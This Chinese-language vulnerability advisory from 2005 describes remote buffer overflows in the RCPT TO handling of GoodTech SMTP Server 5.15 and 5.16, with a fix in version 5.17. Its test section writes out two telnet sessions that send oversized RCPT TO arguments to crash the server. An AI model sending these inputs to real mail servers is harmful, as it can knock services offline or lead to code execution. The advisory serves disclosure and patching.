发布日期：2005-07-25
更新日期：2005-07-25

受影响系统：

GoodTech SMTP Server 5.16
GoodTech SMTP Server 5.15

不受影响系统：

GoodTech SMTP Server 5.17

描述：

---

BUGTRAQ  ID: 14357

GoodTech SMTP Server是一款Windows平台下的SMTP服务程序。

GoodTech SMTP Server在处理RCPT TO命令时存在多个远程溢出漏洞，成功利用这个漏洞的攻击这可以以系统用户的权限执行任意代码。

起因是在将用户数据拷贝到固定大小缓冲区前没有正确的执行边界检查。

<*来源：Rapha Rigo （ml@twilight-hall.net）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=112216357920594&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

1)       $ telnet localhost 25
         Connected to localhost.
         Escape character is '^]'.
         220 test Simple Mail Transfer Service Ready. Version 5.15 (Evaluation)
         HELO aaa
         250 OK
         RCPT TO: <aa@|'A'x1100>
         Connection closed by foreign host.

2)       $ telnet localhost 25
         Connected to localhost.
         Escape character is '^]'.
         220 test Simple Mail Transfer Service Ready. Version 5.15 (Evaluation)
         HELO aaa
         250 OK
         -- Repeat this part 98 times
         RCPT TO: <aa@aa>
         250 OK
         --
         RCPT TO: <|'A'x2600|@localhost>
         250 OK
         QUIT
         Connection closed by foreign host.

建议：

---

厂商补丁：

GoodTech
--------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载5.17版本：

http://www.goodtechsys.com/

浏览次数：2978
严重程度：0（网友投票）